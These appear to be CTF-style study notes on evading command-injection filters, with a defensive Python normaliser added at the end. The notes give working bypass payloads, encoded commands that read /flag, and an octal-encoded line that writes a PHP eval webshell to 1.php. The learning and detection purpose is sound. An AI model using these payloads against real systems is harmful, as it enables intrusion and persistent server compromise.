notes
Space Filter:
In bash, the following characters can be used instead of spaces:
<, <>, %20 (space), %09 (tab), $IFS$9, ${IFS}, $IFS, etc.
$IFS is the field separator variable in Linux. A simple `cat$IFS2`, however, is parsed by bash as one variable named IFS2, so the argument is lost and the output disappears. Writing `${IFS}` delimits the variable name, and appending `$9` after `$IFS` achieves the same truncation. `$9` is used because it is the ninth positional parameter of the current shell process, which is always an empty string here.
Command delimiter
Linux: %0A, %0D, ;, &, |, &&, ||
Windows: %0a, &, |, %1a (a magic character that acts as a command separator in .bat files)
; The "sequential execution" symbol in the shell: commands separated by a semicolon run in order from left to right, and a failing command does not stop the ones after it.
& Simple concatenation with no restriction.
&& The command behind it runs only if the one in front succeeded.
| Pipe: the output of the left side becomes the input of the right side, and the left side's output is not shown. If the first command fails, the second still runs.
|| The command behind it runs only if the one in front failed.
Sensitive character filtering bypass
When ls, cat, flag, etc. are filtered:
- The use of variable bypass
a=l;b=s;$a$b
- Encoding bypass
base64:
root@kali:~# echo 'cat' | base64
Y2F0Cg==
root@kali:~# `echo 'Y2F0Cg==' | base64 -d` test.txt
hello world!
root@kali:~#
hex:
echo "636174202f666c6167" | xxd -r -p|bash ==>cat /flag
octal:
$(printf "\154\163") ==>ls
$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag
{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag
# A webshell can be written this way; its content is <?php @eval($_POST['c']);?>
${printf,"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"} >> 1.php
- Backslash
ca\t fl\ag
- Uninitialised variable $x
cat$x flag.txt
- Joiner
ca''t fla''g.txt
Tips
Under Linux a command can create a file: `1> 1` creates an empty file named 1.
`a> 1` also works: the command errors, but the empty file is still created.
`ls> 1` writes the output of ls straight into the file, but a trailing \n is appended by default.
IP address filtering: an IP address may be converted into a numeric address.
The "dotted decimal" form of an IP address has four parts separated by "."; the numeric form is a single decimal string.
For example, Baidu's IP address "119.75.218.77" converts to the numeric address "2001459789"; entering 2001459789 in the browser reaches the Baidu website.
Conversion URL: http://www.msxindl.com/tools/ip/ip_num.asp
${}
Code execution
${phpinfo()};
ca$@t fla$@g
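Added example, not from the original notes: a Python normaliser a defender can put in front of a blocklist so the space, delimiter, variable, backslash, empty-quote and $@ tricks listed above no longer hide `cat`/`ls`/`flag` from the filter. The regexes and the blocklist are assumptions for this example; base64, hex and printf payloads are not decoded.

```python
"""Canonicalise an obfuscated shell fragment before blocklist matching.
Each step undoes one bypass from the notes above: URL-encoded spaces and
newlines, $IFS/${IFS}/$IFS$9, a=l;b=s;$a$b splitting, unset $x and $@
padding, '<' used as a space, backslashes and empty-quote joiners.
Heuristic for detection, not a shell emulator (assumed patterns)."""
import re
from urllib.parse import unquote

ASSIGN_RE = re.compile(r"\b([A-Za-z_]\w*)=([^;&|\s]*)")   # a=l
IFS_RE = re.compile(r"\$\{IFS\}|\$IFS(?!\w)")              # ${IFS}, $IFS, $IFS$9
VAR_RE = re.compile(r"\$\{?[A-Za-z_]\w*\}?|\$[0-9@*#?]")   # $x, ${x}, $9, $@
DELIM_RE = re.compile(r"\|\||&&|[;&|\r\n]")                # command separators
BLOCKLIST = ("cat", "ls", "flag")                           # words from the notes


def normalize(payload: str) -> list[str]:
    """Return the plain commands hidden in an obfuscated payload."""
    s = unquote(payload)                      # %20 %09 %0A %0D -> real bytes
    s = IFS_RE.sub(" ", s)                    # IFS tricks -> space
    env = dict(ASSIGN_RE.findall(s))          # collect a=l;b=s; assignments
    s = ASSIGN_RE.sub("", s)
    for name, val in env.items():             # inline $a / ${a}
        s = re.sub(r"\$\{%s\}|\$%s(?!\w)" % (name, name), lambda _: val, s)
    s = VAR_RE.sub("", s)                     # unset vars and $9/$@ are empty
    s = s.replace("<>", " ").replace("<", " ")
    s = re.sub(r"\\([A-Za-z])", r"\1", s)     # ca\t -> cat
    s = re.sub(r"''|\"\"", "", s)             # ca''t -> cat
    cmds = (" ".join(c.split()) for c in DELIM_RE.split(s))
    return [c for c in cmds if c]


def flagged(payload: str) -> list[str]:
    """Commands whose words hit the blocklist once the obfuscation is undone."""
    return [c for c in normalize(payload)
            if any(w in BLOCKLIST for w in re.split(r"[^A-Za-z]+", c))]


if __name__ == "__main__":
    for p in (r"ca\t$IFS$9fl\ag", "a=l;b=s;$a$b", "echo hi%0Acat${IFS}flag"):
        print(repr(p), "->", flagged(p))
```

A naive substring check for "cat" misses every one of these payloads; the normalised form is what the blocklist should be matched against.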
Reference from: https://blog.csdn.net/JBlock/article/details/88311388
https://blog.csdn.net/silence1_/article/details/96135760